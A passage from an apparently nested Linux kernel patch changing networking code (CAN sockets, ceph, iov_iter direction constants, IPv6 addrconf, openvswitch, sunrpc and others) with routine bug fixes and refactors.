+ 	/* wait for complete transmission of current pdu */
+ 	wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
+ 
++	/* force state machines to be idle also when a signal occurred */
++	so->tx.state = ISOTP_IDLE;
++	so->rx.state = ISOTP_IDLE;
++
+ 	spin_lock(&isotp_notifier_lock);
+ 	while (isotp_busy_notifier == so) {
+ 		spin_unlock(&isotp_notifier_lock);
+@@ -1194,6 +1188,7 @@ static int isotp_release(struct socket *sock)
+ 		}
+ 	}
+ 
++	hrtimer_cancel(&so->txfrtimer);
+ 	hrtimer_cancel(&so->txtimer);
+ 	hrtimer_cancel(&so->rxtimer);
+ 
+@@ -1597,6 +1592,8 @@ static int isotp_init(struct sock *sk)
+ 	so->rxtimer.function = isotp_rx_timer_handler;
+ 	hrtimer_init(&so->txtimer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_SOFT);
+ 	so->txtimer.function = isotp_tx_timer_handler;
++	hrtimer_init(&so->txfrtimer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_SOFT);
++	so->txfrtimer.function = isotp_txfr_timer_handler;
+ 
+ 	init_waitqueue_head(&so->wait);
+ 	spin_lock_init(&so->rx_lock);
+diff --git a/net/can/j1939/transport.c b/net/can/j1939/transport.c
+index 55f29c9f9e08e..4177e96170703 100644
+--- a/net/can/j1939/transport.c
++++ b/net/can/j1939/transport.c
+@@ -1092,10 +1092,6 @@ static bool j1939_session_deactivate(struct j1939_session *session)
+ 	bool active;
+ 
+ 	j1939_session_list_lock(priv);
+-	/* This function should be called with a session ref-count of at
+-	 * least 2.
+-	 */
+-	WARN_ON_ONCE(kref_read(&session->kref) < 2);
+ 	active = j1939_session_deactivate_locked(session);
+ 	j1939_session_list_unlock(priv);
+ 
+diff --git a/net/can/raw.c b/net/can/raw.c
+index 3eb7d3e2b541f..4abab2c3011a3 100644
+--- a/net/can/raw.c
++++ b/net/can/raw.c
+@@ -132,8 +132,8 @@ static void raw_rcv(struct sk_buff *oskb, void *data)
+ 		return;
+ 
+ 	/* make sure to not pass oversized frames to the socket */
+-	if ((can_is_canfd_skb(oskb) && !ro->fd_frames && !ro->xl_frames) ||
+-	    (can_is_canxl_skb(oskb) && !ro->xl_frames))
++	if ((!ro->fd_frames && can_is_canfd_skb(oskb)) ||
++	    (!ro->xl_frames && can_is_canxl_skb(oskb)))
+ 		return;
+ 
+ 	/* eliminate multiple filter matches for the same skb */
+@@ -670,6 +670,11 @@ static int raw_setsockopt(struct socket *sock, int level, int optname,
+ 		if (copy_from_sockptr(&ro->fd_frames, optval, optlen))
+ 			return -EFAULT;
+ 
++		/* Enabling CAN XL includes CAN FD */
++		if (ro->xl_frames && !ro->fd_frames) {
++			ro->fd_frames = ro->xl_frames;
++			return -EINVAL;
++		}
+ 		break;
+ 
+ 	case CAN_RAW_XL_FRAMES:
+@@ -679,6 +684,9 @@ static int raw_setsockopt(struct socket *sock, int level, int optname,
+ 		if (copy_from_sockptr(&ro->xl_frames, optval, optlen))
+ 			return -EFAULT;
+ 
++		/* Enabling CAN XL includes CAN FD */
++		if (ro->xl_frames)
++			ro->fd_frames = ro->xl_frames;
+ 		break;
+ 
+ 	case CAN_RAW_JOIN_FILTERS:
+@@ -786,6 +794,25 @@ static int raw_getsockopt(struct socket *sock, int level, int optname,
+ 	return 0;
+ }
+ 
++static bool raw_bad_txframe(struct raw_sock *ro, struct sk_buff *skb, int mtu)
++{
++	/* Classical CAN -> no checks for flags and device capabilities */
++	if (can_is_can_skb(skb))
++		return false;
++
++	/* CAN FD -> needs to be enabled and a CAN FD or CAN XL device */
++	if (ro->fd_frames && can_is_canfd_skb(skb) &&
++	    (mtu == CANFD_MTU || can_is_canxl_dev_mtu(mtu)))
++		return false;
++
++	/* CAN XL -> needs to be enabled and a CAN XL device */
++	if (ro->xl_frames && can_is_canxl_skb(skb) &&
++	    can_is_canxl_dev_mtu(mtu))
++		return false;
++
++	return true;
++}
++
+ static int raw_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ {
+ 	struct sock *sk = sock->sk;
+@@ -833,20 +860,8 @@ static int raw_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 		goto free_skb;
+ 
+ 	err = -EINVAL;
+-	if (ro->xl_frames && can_is_canxl_dev_mtu(dev->mtu)) {
+-		/* CAN XL, CAN FD and Classical CAN */
+-		if (!can_is_canxl_skb(skb) && !can_is_canfd_skb(skb) &&
+-		    !can_is_can_skb(skb))
+-			goto free_skb;
+-	} else if (ro->fd_frames && dev->mtu == CANFD_MTU) {
+-		/* CAN FD and Classical CAN */
+-		if (!can_is_canfd_skb(skb) && !can_is_can_skb(skb))
+-			goto free_skb;
+-	} else {
+-		/* Classical CAN */
+-		if (!can_is_can_skb(skb))
+-			goto free_skb;
+-	}
++	if (raw_bad_txframe(ro, skb, dev->mtu))
++		goto free_skb;
+ 
+ 	sockcm_init(&sockc, sk);
+ 	if (msg->msg_controllen) {
+diff --git a/net/ceph/messenger_v1.c b/net/ceph/messenger_v1.c
+index 3ddbde87e4d6e..d1787d7d33ef9 100644
+--- a/net/ceph/messenger_v1.c
++++ b/net/ceph/messenger_v1.c
+@@ -30,7 +30,7 @@ static int ceph_tcp_recvmsg(struct socket *sock, void *buf, size_t len)
+ 	if (!buf)
+ 		msg.msg_flags |= MSG_TRUNC;
+ 
+-	iov_iter_kvec(&msg.msg_iter, READ, &iov, 1, len);
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, &iov, 1, len);
+ 	r = sock_recvmsg(sock, &msg, msg.msg_flags);
+ 	if (r == -EAGAIN)
+ 		r = 0;
+@@ -49,7 +49,7 @@ static int ceph_tcp_recvpage(struct socket *sock, struct page *page,
+ 	int r;
+ 
+ 	BUG_ON(page_offset + length > PAGE_SIZE);
+-	iov_iter_bvec(&msg.msg_iter, READ, &bvec, 1, length);
++	iov_iter_bvec(&msg.msg_iter, ITER_DEST, &bvec, 1, length);
+ 	r = sock_recvmsg(sock, &msg, msg.msg_flags);
+ 	if (r == -EAGAIN)
+ 		r = 0;
+diff --git a/net/ceph/messenger_v2.c b/net/ceph/messenger_v2.c
+index cc8ff81a50b7f..3009028c4fa28 100644
+--- a/net/ceph/messenger_v2.c
++++ b/net/ceph/messenger_v2.c
+@@ -168,7 +168,7 @@ static int do_try_sendpage(struct socket *sock, struct iov_iter *it)
+ 						  bv.bv_offset, bv.bv_len,
+ 						  CEPH_MSG_FLAGS);
+ 		} else {
+-			iov_iter_bvec(&msg.msg_iter, WRITE, &bv, 1, bv.bv_len);
++			iov_iter_bvec(&msg.msg_iter, ITER_SOURCE, &bv, 1, bv.bv_len);
+ 			ret = sock_sendmsg(sock, &msg);
+ 		}
+ 		if (ret <= 0) {
+@@ -225,7 +225,7 @@ static void reset_in_kvecs(struct ceph_connection *con)
+ 	WARN_ON(iov_iter_count(&con->v2.in_iter));
+ 
+ 	con->v2.in_kvec_cnt = 0;
+-	iov_iter_kvec(&con->v2.in_iter, READ, con->v2.in_kvecs, 0, 0);
++	iov_iter_kvec(&con->v2.in_iter, ITER_DEST, con->v2.in_kvecs, 0, 0);
+ }
+ 
+ static void set_in_bvec(struct ceph_connection *con, const struct bio_vec *bv)
+@@ -233,7 +233,7 @@ static void set_in_bvec(struct ceph_connection *con, const struct bio_vec *bv)
+ 	WARN_ON(iov_iter_count(&con->v2.in_iter));
+ 
+ 	con->v2.in_bvec = *bv;
+-	iov_iter_bvec(&con->v2.in_iter, READ, &con->v2.in_bvec, 1, bv->bv_len);
++	iov_iter_bvec(&con->v2.in_iter, ITER_DEST, &con->v2.in_bvec, 1, bv->bv_len);
+ }
+ 
+ static void set_in_skip(struct ceph_connection *con, int len)
+@@ -241,7 +241,7 @@ static void set_in_skip(struct ceph_connection *con, int len)
+ 	WARN_ON(iov_iter_count(&con->v2.in_iter));
+ 
+ 	dout("%s con %p len %d\n", __func__, con, len);
+-	iov_iter_discard(&con->v2.in_iter, READ, len);
++	iov_iter_discard(&con->v2.in_iter, ITER_DEST, len);
+ }
+ 
+ static void add_out_kvec(struct ceph_connection *con, void *buf, int len)
+@@ -265,7 +265,7 @@ static void reset_out_kvecs(struct ceph_connection *con)
+ 
+ 	con->v2.out_kvec_cnt = 0;
+ 
+-	iov_iter_kvec(&con->v2.out_iter, WRITE, con->v2.out_kvecs, 0, 0);
++	iov_iter_kvec(&con->v2.out_iter, ITER_SOURCE, con->v2.out_kvecs, 0, 0);
+ 	con->v2.out_iter_sendpage = false;
+ }
+ 
+@@ -277,7 +277,7 @@ static void set_out_bvec(struct ceph_connection *con, const struct bio_vec *bv,
+ 
+ 	con->v2.out_bvec = *bv;
+ 	con->v2.out_iter_sendpage = zerocopy;
+-	iov_iter_bvec(&con->v2.out_iter, WRITE, &con->v2.out_bvec, 1,
++	iov_iter_bvec(&con->v2.out_iter, ITER_SOURCE, &con->v2.out_bvec, 1,
+ 		      con->v2.out_bvec.bv_len);
+ }
+ 
+@@ -290,7 +290,7 @@ static void set_out_bvec_zero(struct ceph_connection *con)
+ 	con->v2.out_bvec.bv_offset = 0;
+ 	con->v2.out_bvec.bv_len = min(con->v2.out_zero, (int)PAGE_SIZE);
+ 	con->v2.out_iter_sendpage = true;
+-	iov_iter_bvec(&con->v2.out_iter, WRITE, &con->v2.out_bvec, 1,
++	iov_iter_bvec(&con->v2.out_iter, ITER_SOURCE, &con->v2.out_bvec, 1,
+ 		      con->v2.out_bvec.bv_len);
+ }
+ 
+diff --git a/net/compat.c b/net/compat.c
+index 385f04a6be2f7..161b7bea1f620 100644
+--- a/net/compat.c
++++ b/net/compat.c
+@@ -95,7 +95,8 @@ int get_compat_msghdr(struct msghdr *kmsg,
+ 	if (err)
+ 		return err;
+ 
+-	err = import_iovec(save_addr ? READ : WRITE, compat_ptr(msg.msg_iov), msg.msg_iovlen,
++	err = import_iovec(save_addr ? ITER_DEST : ITER_SOURCE,
++			   compat_ptr(msg.msg_iov), msg.msg_iovlen,
+ 			   UIO_FASTIOV, iov, &kmsg->msg_iter);
+ 	return err < 0 ? err : 0;
+ }
+diff --git a/net/core/gro.c b/net/core/gro.c
+index 1b4abfb9a7a13..352f966cb1dac 100644
+--- a/net/core/gro.c
++++ b/net/core/gro.c
+@@ -162,6 +162,15 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb)
+ 	struct sk_buff *lp;
+ 	int segs;
+ 
++	/* Do not splice page pool based packets w/ non-page pool
++	 * packets. This can result in reference count issues as page
++	 * pool pages will not decrement the reference count and will
++	 * instead be immediately returned to the pool or have frag
++	 * count decremented.
++	 */
++	if (p->pp_recycle != skb->pp_recycle)
++		return -ETOOMANYREFS;
++
+ 	/* pairs with WRITE_ONCE() in netif_set_gro_max_size() */
+ 	gro_max_size = READ_ONCE(p->dev->gro_max_size);
+ 
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index ec19ed7224536..6667c3538f2ab 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -2001,7 +2001,7 @@ static int receive_fallback_to_copy(struct sock *sk,
+ 	if (copy_address != zc->copybuf_address)
+ 		return -EINVAL;
+ 
+-	err = import_single_range(READ, (void __user *)copy_address,
++	err = import_single_range(ITER_DEST, (void __user *)copy_address,
+ 				  inq, &iov, &msg.msg_iter);
+ 	if (err)
+ 		return err;
+@@ -2035,7 +2035,7 @@ static int tcp_copy_straggler_data(struct tcp_zerocopy_receive *zc,
+ 	if (copy_address != zc->copybuf_address)
+ 		return -EINVAL;
+ 
+-	err = import_single_range(READ, (void __user *)copy_address,
++	err = import_single_range(ITER_DEST, (void __user *)copy_address,
+ 				  copylen, &iov, &msg.msg_iter);
+ 	if (err)
+ 		return err;
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index 94aad3870c5fc..cf26d65ca3893 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -6,6 +6,7 @@
+ #include <linux/bpf.h>
+ #include <linux/init.h>
+ #include <linux/wait.h>
++#include <linux/util_macros.h>
+ 
+ #include <net/inet_common.h>
+ #include <net/tls.h>
+@@ -639,10 +640,9 @@ EXPORT_SYMBOL_GPL(tcp_bpf_update_proto);
+  */
+ void tcp_bpf_clone(const struct sock *sk, struct sock *newsk)
+ {
+-	int family = sk->sk_family == AF_INET6 ? TCP_BPF_IPV6 : TCP_BPF_IPV4;
+ 	struct proto *prot = newsk->sk_prot;
+ 
+-	if (prot == &tcp_bpf_prots[family][TCP_BPF_BASE])
++	if (is_insidevar(prot, tcp_bpf_prots))
+ 		newsk->sk_prot = sk->sk_prot_creator;
+ }
+ #endif /* CONFIG_BPF_SYSCALL */
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index 9c3f5202a97ba..e6c7edcf68343 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -3127,17 +3127,17 @@ static void add_v4_addrs(struct inet6_dev *idev)
+ 		offset = sizeof(struct in6_addr) - 4;
+ 	memcpy(&addr.s6_addr32[3], idev->dev->dev_addr + offset, 4);
+ 
+-	if (idev->dev->flags&IFF_POINTOPOINT) {
++	if (!(idev->dev->flags & IFF_POINTOPOINT) && idev->dev->type == ARPHRD_SIT) {
++		scope = IPV6_ADDR_COMPATv4;
++		plen = 96;
++		pflags |= RTF_NONEXTHOP;
++	} else {
+ 		if (idev->cnf.addr_gen_mode == IN6_ADDR_GEN_MODE_NONE)
+ 			return;
+ 
+ 		addr.s6_addr32[0] = htonl(0xfe800000);
+ 		scope = IFA_LINK;
+ 		plen = 64;
+-	} else {
+-		scope = IPV6_ADDR_COMPATv4;
+-		plen = 96;
+-		pflags |= RTF_NONEXTHOP;
+ 	}
+ 
+ 	if (addr.s6_addr32[3]) {
+@@ -3447,6 +3447,30 @@ static void addrconf_gre_config(struct net_device *dev)
+ }
+ #endif
+ 
++static void addrconf_init_auto_addrs(struct net_device *dev)
++{
++	switch (dev->type) {
++#if IS_ENABLED(CONFIG_IPV6_SIT)
++	case ARPHRD_SIT:
++		addrconf_sit_config(dev);
++		break;
++#endif
++#if IS_ENABLED(CONFIG_NET_IPGRE) || IS_ENABLED(CONFIG_IPV6_GRE)
++	case ARPHRD_IP6GRE:
++	case ARPHRD_IPGRE:
++		addrconf_gre_config(dev);
++		break;
++#endif
++	case ARPHRD_LOOPBACK:
++		init_loopback(dev);
++		break;
++
++	default:
++		addrconf_dev_config(dev);
++		break;
++	}
++}
++
+ static int fixup_permanent_addr(struct net *net,
+ 				struct inet6_dev *idev,
+ 				struct inet6_ifaddr *ifp)
+@@ -3615,26 +3639,7 @@ static int addrconf_notify(struct notifier_block *this, unsigned long event,
+ 			run_pending = 1;
+ 		}
+ 
+-		switch (dev->type) {
+-#if IS_ENABLED(CONFIG_IPV6_SIT)
+-		case ARPHRD_SIT:
+-			addrconf_sit_config(dev);
+-			break;
+-#endif
+-#if IS_ENABLED(CONFIG_NET_IPGRE) || IS_ENABLED(CONFIG_IPV6_GRE)
+-		case ARPHRD_IP6GRE:
+-		case ARPHRD_IPGRE:
+-			addrconf_gre_config(dev);
+-			break;
+-#endif
+-		case ARPHRD_LOOPBACK:
+-			init_loopback(dev);
+-			break;
+-
+-		default:
+-			addrconf_dev_config(dev);
+-			break;
+-		}
++		addrconf_init_auto_addrs(dev);
+ 
+ 		if (!IS_ERR_OR_NULL(idev)) {
+ 			if (run_pending)
+@@ -6397,7 +6402,7 @@ static int addrconf_sysctl_addr_gen_mode(struct ctl_table *ctl, int write,
+ 
+ 			if (idev->cnf.addr_gen_mode != new_val) {
+ 				idev->cnf.addr_gen_mode = new_val;
+-				addrconf_dev_config(idev->dev);
++				addrconf_init_auto_addrs(idev->dev);
+ 			}
+ 		} else if (&net->ipv6.devconf_all->addr_gen_mode == ctl->data) {
+ 			struct net_device *dev;
+@@ -6408,7 +6413,7 @@ static int addrconf_sysctl_addr_gen_mode(struct ctl_table *ctl, int write,
+ 				if (idev &&
+ 				    idev->cnf.addr_gen_mode != new_val) {
+ 					idev->cnf.addr_gen_mode = new_val;
+-					addrconf_dev_config(idev->dev);
++					addrconf_init_auto_addrs(idev->dev);
+ 				}
+ 			}
+ 		}
+diff --git a/net/netfilter/ipvs/ip_vs_sync.c b/net/netfilter/ipvs/ip_vs_sync.c
+index a56fd0b5a430a..4963fec815da3 100644
+--- a/net/netfilter/ipvs/ip_vs_sync.c
++++ b/net/netfilter/ipvs/ip_vs_sync.c
+@@ -1617,7 +1617,7 @@ ip_vs_receive(struct socket *sock, char *buffer, const size_t buflen)
+ 	EnterFunction(7);
+ 
+ 	/* Receive a packet */
+-	iov_iter_kvec(&msg.msg_iter, READ, &iov, 1, buflen);
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, &iov, 1, buflen);
+ 	len = sock_recvmsg(sock, &msg, MSG_DONTWAIT);
+ 	if (len < 0)
+ 		return len;
+diff --git a/net/netrom/af_netrom.c b/net/netrom/af_netrom.c
+index 6f7f4392cffb1..5a4cb796150f5 100644
+--- a/net/netrom/af_netrom.c
++++ b/net/netrom/af_netrom.c
+@@ -400,6 +400,11 @@ static int nr_listen(struct socket *sock, int backlog)
+ 	struct sock *sk = sock->sk;
+ 
+ 	lock_sock(sk);
++	if (sock->state != SS_UNCONNECTED) {
++		release_sock(sk);
++		return -EINVAL;
++	}
++
+ 	if (sk->sk_state != TCP_LISTEN) {
+ 		memset(&nr_sk(sk)->user_addr, 0, AX25_ADDR_LEN);
+ 		sk->sk_max_ack_backlog = backlog;
+diff --git a/net/openvswitch/datapath.c b/net/openvswitch/datapath.c
+index fa0f1952d7637..5920fdca12875 100644
+--- a/net/openvswitch/datapath.c
++++ b/net/openvswitch/datapath.c
+@@ -979,14 +979,14 @@ static int ovs_flow_cmd_new(struct sk_buff *skb, struct genl_info *info)
+ 	key = kzalloc(sizeof(*key), GFP_KERNEL);
+ 	if (!key) {
+ 		error = -ENOMEM;
+-		goto err_kfree_key;
++		goto err_kfree_flow;
+ 	}
+ 
+ 	ovs_match_init(&match, key, false, &mask);
+ 	error = ovs_nla_get_match(net, &match, a[OVS_FLOW_ATTR_KEY],
+ 				  a[OVS_FLOW_ATTR_MASK], log);
+ 	if (error)
+-		goto err_kfree_flow;
++		goto err_kfree_key;
+ 
+ 	ovs_flow_mask_key(&new_flow->key, key, true, &mask);
+ 
+@@ -994,14 +994,14 @@ static int ovs_flow_cmd_new(struct sk_buff *skb, struct genl_info *info)
+ 	error = ovs_nla_get_identifier(&new_flow->id, a[OVS_FLOW_ATTR_UFID],
+ 				       key, log);
+ 	if (error)
+-		goto err_kfree_flow;
++		goto err_kfree_key;
+ 
+ 	/* Validate actions. */
+ 	error = ovs_nla_copy_actions(net, a[OVS_FLOW_ATTR_ACTIONS],
+ 				     &new_flow->key, &acts, log);
+ 	if (error) {
+ 		OVS_NLERR(log, "Flow actions may not be safe on all matching packets.");
+-		goto err_kfree_flow;
++		goto err_kfree_key;
+ 	}
+ 
+ 	reply = ovs_flow_cmd_alloc_info(acts, &new_flow->id, info, false,
+@@ -1101,10 +1101,10 @@ err_unlock_ovs:
+ 	kfree_skb(reply);
+ err_kfree_acts:
+ 	ovs_nla_free_flow_actions(acts);
+-err_kfree_flow:
+-	ovs_flow_free(new_flow, false);
+ err_kfree_key:
+ 	kfree(key);
++err_kfree_flow:
++	ovs_flow_free(new_flow, false);
+ error:
+ 	return error;
+ }
+diff --git a/net/qrtr/ns.c b/net/qrtr/ns.c
+index 1990d496fcfc0..e595079c2cafe 100644
+--- a/net/qrtr/ns.c
++++ b/net/qrtr/ns.c
+@@ -83,7 +83,10 @@ static struct qrtr_node *node_get(unsigned int node_id)
+ 
+ 	node->id = node_id;
+ 
+-	radix_tree_insert(&nodes, node_id, node);
++	if (radix_tree_insert(&nodes, node_id, node)) {
++		kfree(node);
++		return NULL;
++	}
+ 
+ 	return node;
+ }
+diff --git a/net/sctp/transport.c b/net/sctp/transport.c
+index f8fd98784977a..b3f1a91e9a079 100644
+--- a/net/sctp/transport.c
++++ b/net/sctp/transport.c
+@@ -196,9 +196,7 @@ void sctp_transport_reset_hb_timer(struct sctp_transport *transport)
+ 
+ 	/* When a data chunk is sent, reset the heartbeat interval.  */
+ 	expires = jiffies + sctp_transport_timeout(transport);
+-	if ((time_before(transport->hb_timer.expires, expires) ||
+-	     !timer_pending(&transport->hb_timer)) &&
+-	    !mod_timer(&transport->hb_timer,
++	if (!mod_timer(&transport->hb_timer,
+ 		       expires + prandom_u32_max(transport->rto)))
+ 		sctp_transport_hold(transport);
+ }
+diff --git a/net/smc/smc_clc.c b/net/smc/smc_clc.c
+index 1472f31480d8b..dfb9797f7bc63 100644
+--- a/net/smc/smc_clc.c
++++ b/net/smc/smc_clc.c
+@@ -673,7 +673,7 @@ int smc_clc_wait_msg(struct smc_sock *smc, void *buf, int buflen,
+ 	 */
+ 	krflags = MSG_PEEK | MSG_WAITALL;
+ 	clc_sk->sk_rcvtimeo = timeout;
+-	iov_iter_kvec(&msg.msg_iter, READ, &vec, 1,
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, &vec, 1,
+ 			sizeof(struct smc_clc_msg_hdr));
+ 	len = sock_recvmsg(smc->clcsock, &msg, krflags);
+ 	if (signal_pending(current)) {
+@@ -720,7 +720,7 @@ int smc_clc_wait_msg(struct smc_sock *smc, void *buf, int buflen,
+ 	} else {
+ 		recvlen = datlen;
+ 	}
+-	iov_iter_kvec(&msg.msg_iter, READ, &vec, 1, recvlen);
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, &vec, 1, recvlen);
+ 	krflags = MSG_WAITALL;
+ 	len = sock_recvmsg(smc->clcsock, &msg, krflags);
+ 	if (len < recvlen || !smc_clc_msg_hdr_valid(clcm, check_trl)) {
+@@ -737,7 +737,7 @@ int smc_clc_wait_msg(struct smc_sock *smc, void *buf, int buflen,
+ 		/* receive remaining proposal message */
+ 		recvlen = datlen > SMC_CLC_RECV_BUF_LEN ?
+ 						SMC_CLC_RECV_BUF_LEN : datlen;
+-		iov_iter_kvec(&msg.msg_iter, READ, &vec, 1, recvlen);
++		iov_iter_kvec(&msg.msg_iter, ITER_DEST, &vec, 1, recvlen);
+ 		len = sock_recvmsg(smc->clcsock, &msg, krflags);
+ 		datlen -= len;
+ 	}
+diff --git a/net/smc/smc_tx.c b/net/smc/smc_tx.c
+index 64dedffe9d269..f4b6a71ac488a 100644
+--- a/net/smc/smc_tx.c
++++ b/net/smc/smc_tx.c
+@@ -308,7 +308,7 @@ int smc_tx_sendpage(struct smc_sock *smc, struct page *page, int offset,
+ 
+ 	iov.iov_base = kaddr + offset;
+ 	iov.iov_len = size;
+-	iov_iter_kvec(&msg.msg_iter, WRITE, &iov, 1, size);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, &iov, 1, size);
+ 	rc = smc_tx_sendmsg(smc, &msg, size);
+ 	kunmap(page);
+ 	return rc;
+diff --git a/net/socket.c b/net/socket.c
+index 00da9ce3dba0b..73463c7c3702b 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -750,7 +750,7 @@ EXPORT_SYMBOL(sock_sendmsg);
+ int kernel_sendmsg(struct socket *sock, struct msghdr *msg,
+ 		   struct kvec *vec, size_t num, size_t size)
+ {
+-	iov_iter_kvec(&msg->msg_iter, WRITE, vec, num, size);
++	iov_iter_kvec(&msg->msg_iter, ITER_SOURCE, vec, num, size);
+ 	return sock_sendmsg(sock, msg);
+ }
+ EXPORT_SYMBOL(kernel_sendmsg);
+@@ -776,7 +776,7 @@ int kernel_sendmsg_locked(struct sock *sk, struct msghdr *msg,
+ 	if (!sock->ops->sendmsg_locked)
+ 		return sock_no_sendmsg_locked(sk, msg, size);
+ 
+-	iov_iter_kvec(&msg->msg_iter, WRITE, vec, num, size);
++	iov_iter_kvec(&msg->msg_iter, ITER_SOURCE, vec, num, size);
+ 
+ 	return sock->ops->sendmsg_locked(sk, msg, msg_data_left(msg));
+ }
+@@ -1034,7 +1034,7 @@ int kernel_recvmsg(struct socket *sock, struct msghdr *msg,
+ 		   struct kvec *vec, size_t num, size_t size, int flags)
+ {
+ 	msg->msg_control_is_user = false;
+-	iov_iter_kvec(&msg->msg_iter, READ, vec, num, size);
++	iov_iter_kvec(&msg->msg_iter, ITER_DEST, vec, num, size);
+ 	return sock_recvmsg(sock, msg, flags);
+ }
+ EXPORT_SYMBOL(kernel_recvmsg);
+@@ -2092,7 +2092,7 @@ int __sys_sendto(int fd, void __user *buff, size_t len, unsigned int flags,
+ 	struct iovec iov;
+ 	int fput_needed;
+ 
+-	err = import_single_range(WRITE, buff, len, &iov, &msg.msg_iter);
++	err = import_single_range(ITER_SOURCE, buff, len, &iov, &msg.msg_iter);
+ 	if (unlikely(err))
+ 		return err;
+ 	sock = sockfd_lookup_light(fd, &err, &fput_needed);
+@@ -2157,7 +2157,7 @@ int __sys_recvfrom(int fd, void __user *ubuf, size_t size, unsigned int flags,
+ 	int err, err2;
+ 	int fput_needed;
+ 
+-	err = import_single_range(READ, ubuf, size, &iov, &msg.msg_iter);
++	err = import_single_range(ITER_DEST, ubuf, size, &iov, &msg.msg_iter);
+ 	if (unlikely(err))
+ 		return err;
+ 	sock = sockfd_lookup_light(fd, &err, &fput_needed);
+@@ -2417,7 +2417,7 @@ static int copy_msghdr_from_user(struct msghdr *kmsg,
+ 	if (err)
+ 		return err;
+ 
+-	err = import_iovec(save_addr ? READ : WRITE,
++	err = import_iovec(save_addr ? ITER_DEST : ITER_SOURCE,
+ 			    msg.msg_iov, msg.msg_iovlen,
+ 			    UIO_FASTIOV, iov, &kmsg->msg_iter);
+ 	return err < 0 ? err : 0;
+diff --git a/net/sunrpc/socklib.c b/net/sunrpc/socklib.c
+index 71ba4cf513bce..1b2b84feeec69 100644
+--- a/net/sunrpc/socklib.c
++++ b/net/sunrpc/socklib.c
+@@ -214,14 +214,14 @@ static inline int xprt_sendmsg(struct socket *sock, struct msghdr *msg,
+ static int xprt_send_kvec(struct socket *sock, struct msghdr *msg,
+ 			  struct kvec *vec, size_t seek)
+ {
+-	iov_iter_kvec(&msg->msg_iter, WRITE, vec, 1, vec->iov_len);
++	iov_iter_kvec(&msg->msg_iter, ITER_SOURCE, vec, 1, vec->iov_len);
+ 	return xprt_sendmsg(sock, msg, seek);
+ }
+ 
+ static int xprt_send_pagedata(struct socket *sock, struct msghdr *msg,
+ 			      struct xdr_buf *xdr, size_t base)
+ {
+-	iov_iter_bvec(&msg->msg_iter, WRITE, xdr->bvec, xdr_buf_pagecount(xdr),
++	iov_iter_bvec(&msg->msg_iter, ITER_SOURCE, xdr->bvec, xdr_buf_pagecount(xdr),
+ 		      xdr->page_len + xdr->page_base);
+ 	return xprt_sendmsg(sock, msg, base + xdr->page_base);
+ }
+@@ -244,7 +244,7 @@ static int xprt_send_rm_and_kvec(struct socket *sock, struct msghdr *msg,
+ 	};
+ 	size_t len = iov[0].iov_len + iov[1].iov_len;
+ 
+-	iov_iter_kvec(&msg->msg_iter, WRITE, iov, 2, len);
++	iov_iter_kvec(&msg->msg_iter, ITER_SOURCE, iov, 2, len);
+ 	return xprt_sendmsg(sock, msg, base);
+ }
+ 
+diff --git a/net/sunrpc/svcsock.c b/net/sunrpc/svcsock.c
+index e833103f46291..815baf308236a 100644
+--- a/net/sunrpc/svcsock.c
++++ b/net/sunrpc/svcsock.c
+@@ -260,7 +260,7 @@ static ssize_t svc_tcp_read_msg(struct svc_rqst *rqstp, size_t buflen,
+ 	rqstp->rq_respages = &rqstp->rq_pages[i];
+ 	rqstp->rq_next_page = rqstp->rq_respages + 1;
+ 
+-	iov_iter_bvec(&msg.msg_iter, READ, bvec, i, buflen);
++	iov_iter_bvec(&msg.msg_iter, ITER_DEST, bvec, i, buflen);
+ 	if (seek) {
+ 		iov_iter_advance(&msg.msg_iter, seek);
+ 		buflen -= seek;
+@@ -874,7 +874,7 @@ static ssize_t svc_tcp_read_marker(struct svc_sock *svsk,
+ 		want = sizeof(rpc_fraghdr) - svsk->sk_tcplen;
+ 		iov.iov_base = ((char *)&svsk->sk_marker) + svsk->sk_tcplen;
+ 		iov.iov_len  = want;
+-		iov_iter_kvec(&msg.msg_iter, READ, &iov, 1, want);
++		iov_iter_kvec(&msg.msg_iter, ITER_DEST, &iov, 1, want);
+ 		len = sock_recvmsg(svsk->sk_sock, &msg, MSG_DONTWAIT);
+ 		if (len < 0)
+ 			return len;
+diff --git a/net/sunrpc/xprtsock.c b/net/sunrpc/xprtsock.c
+index 915b9902f673b..b3ab6d9d752ea 100644
+--- a/net/sunrpc/xprtsock.c
++++ b/net/sunrpc/xprtsock.c
+@@ -364,7 +364,7 @@ static ssize_t
+ xs_read_kvec(struct socket *sock, struct msghdr *msg, int flags,
+ 		struct kvec *kvec, size_t count, size_t seek)
+ {
+-	iov_iter_kvec(&msg->msg_iter, READ, kvec, 1, count);
++	iov_iter_kvec(&msg->msg_iter, ITER_DEST, kvec, 1, count);
+ 	return xs_sock_recvmsg(sock, msg, flags, seek);
+ }
+ 
+@@ -373,7 +373,7 @@ xs_read_bvec(struct socket *sock, struct msghdr *msg, int flags,
+ 		struct bio_vec *bvec, unsigned long nr, size_t count,
+ 		size_t seek)
+ {
+-	iov_iter_bvec(&msg->msg_iter, READ, bvec, nr, count);
++	iov_iter_bvec(&msg->msg_iter, ITER_DEST, bvec, nr, count);
+ 	return xs_sock_recvmsg(sock, msg, flags, seek);
+ }
+ 
+@@ -381,7 +381,7 @@ static ssize_t
+ xs_read_discard(struct socket *sock, struct msghdr *msg, int flags,
+ 		size_t count)
+ {
+-	iov_iter_discard(&msg->msg_iter, READ, count);
